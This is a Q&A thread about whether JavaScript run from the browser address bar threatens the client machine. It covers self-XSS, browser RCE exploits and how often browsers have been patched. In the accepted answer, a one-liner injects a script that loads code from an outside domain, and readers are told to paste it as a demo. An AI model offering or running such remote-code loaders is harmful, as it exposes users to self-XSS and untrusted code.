22

Given the fact that modern browsers these days prohibit JavaScript from having access to any resources on the client's machine, does JavaScript execution from the address bar pose any threat at all to the client's machine (the machine the browser is running on)?

Anders
  • 64,406
  • 24
  • 178
  • 215
gurvinder372
  • 823
  • 2
  • 8
  • 9

2 Answers2

29

That JavaScript executed from the address bar will run in the context of the website displayed in that tab. This means complete access to that website and it could change how the website looks and behaves from the point of view of the user.

This attack is called self XSS and can cause harm to the user and indirectly to the machine. A reputable website can ask the user to download and install a malicious piece of executable code by pretending, for example, that it needs a Flash update.

To get a nice visual example of this, manually type javascript: in your address bar and then paste this: z=document.createElement("script");z.src="https://peniscorp.com/topkek.js"; document.body.appendChild(z); If you don't trust me, do it in the address bar of a website you are not logged in.

Most browsers have realised this vulnerability and attempt to limit the impact by cutting out javascript: when pasting javascript:some_js_code in the address bar. But it is still possible to manually write it and execute it.

Cristian Dobre
  • 9,797
  • 1
  • 30
  • 50
7

I would like to complete the Accepted Answer from Cristian Dobre, which is correct but incomplete.

Executing javascript (whether it is via an address bar or via more classic means does not matter here) can, in some cases, lead to Remote Code Execution by exploiting buffer overflows (or similar flaws) in browsers. This is one of the reasons why patching browsers regularly is pretty important.

Such occurrences are rarely discovered in the wild but exist, and new ones are discovered every year (Chrome had less than Firefox which has WAY LESS than IE, in the past).

A good example here on SO : https://stackoverflow.com/questions/381171/help-me-understand-this-javascript-exploit

So, to answer your question : yes, it can harm a client's machine. If the machine is fully patched, only a zero-day (extremely unlikely yet still technically possible) could do such harm. Zero-days with such power are mostly, "luckily", used for targeted attacks to avoid attention and maximize the chances of non-detection (and, thus, future reuse).

niilzon
  • 1,587
  • 2
  • 10
  • 17
  • Can you please elaborate on ` If the machine is fully patched`? – gurvinder372 Mar 29 '16 at 13:45
  • What I meant by "if the machine is fully patched" is : "if the browser is fully patched". In attacks like this, patching the OS makes no difference (even though unpatched OS'es obviously open other attack vectors). Actually, but this is not specifically related to Javascript, all browser plugins running some code one way or another (see : Java browser plugin, Flash) should be patched. If you take a look at the link in my response, you will see that this example leverages a bug in a IE lib. I don't know the details of that particular sample but I would guess that it works only with old IE's – niilzon Mar 29 '16 at 14:17
  • Actually modern browsers do use security provisions provided by the OS (such as running their rendering processes in low integrity mode in Windows) so patching the OS can make a big difference for exploits. Also any actual source for your claim that chrome has "WAY LESS [security exploits] than IE"? Or are we talking ancient past here? Because comparing IE11 CVE entries to Chrome shows a rather similar picture and IE + EMET is pretty much the most secure browser there is at the moment. – Voo Mar 30 '16 at 07:07
  • @Voo : my source for "Chrome has less than Firefox which has less than IE" is, for example for 2015, the results of the Pwn2Own contest http://www.zdnet.com/article/pwn2own-2015-the-year-every-browser-went-down/ As far as I remember, similar results come back every year. I must admit that I do not have a consolidated list of all previously such found exploits. – niilzon Mar 30 '16 at 07:24
  • @niilzon pwn2own just shows that every single browser got hacked. Which has happened for the last few years. Actually I can think of only a single price not collected and that was in 2014 for IE11 with EMET (which had more to do with the fact that you could sell that exploit for quite a bit more to governments than that it was impossible). If you go by CVE entries, the different browsers seem rather similar for remote execution exploits and all around (as long as you stick with the latest versions of IE and don't throw the older ones in as well). – Voo Mar 30 '16 at 07:48